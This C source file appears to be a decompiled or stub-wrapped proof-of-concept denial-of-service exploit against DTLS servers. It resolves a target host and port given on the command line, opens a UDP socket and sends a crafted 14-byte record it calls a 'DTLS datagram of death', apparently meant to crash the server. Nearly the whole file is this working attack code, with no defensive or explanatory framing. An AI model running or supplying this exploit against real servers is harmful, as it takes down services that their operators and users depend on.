
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef int target ;
struct TYPE_2__ {char s_addr; } ;
struct sockaddr_in {int sin_port; TYPE_1__ sin_addr; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {char** h_addr_list; int h_length; int h_addrtype; } ;


 int AF_INET ;
 int SOCK_DGRAM ;
 int atoi (char*) ;
 int close (int) ;
 int connect (int,struct sockaddr*,int) ;
 int errno ;
 int exit (int) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int ) ;
 int memcpy (char*,char*,int) ;
 int printf (char*,char*,...) ;
 int send (int,char*,int,int ) ;
 int socket (int ,int ,int ) ;
 char* strerror (int ) ;

int
main(int argc, char **argv)
{
 int sock, ret;
 char *ptr, *err;
 struct hostent *h;
 struct sockaddr_in target;
 char buf[64];

 if (argc < 3) {
  err = "Pass the host and port of the target DTLS server";
  printf("[-] Error: %s\n", err);
  exit(1);
 }

 h = gethostbyname(argv[1]);
 if (!h) {
  err = "Unknown host specified";
  printf("[-] Error: %s (%s)\n", err, strerror(errno));
  exit(1);
 }

 target.sin_family = h->h_addrtype;
 memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
 target.sin_port = htons(atoi(argv[2]));

 sock = socket(AF_INET, SOCK_DGRAM, 0);
 if (sock == -1) {
  err = "Failed creating UDP socket";
  printf("[-] Error: %s (%s)\n", err, strerror(errno));
  exit(1);
 }

 ret = connect(sock, (struct sockaddr *) &target, sizeof(target));
 if (ret == -1) {
  err = "Failed to connect socket";
  printf("[-] Error: %s (%s)\n", err, strerror(errno));
  exit(1);
 }

 memcpy(buf, "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01", 14);

 printf("[+] Sending DTLS datagram of death at %s:%s...\n", argv[1], argv[2]);

 send(sock, buf, 14, 0);

 close(sock);

 return 0;
}
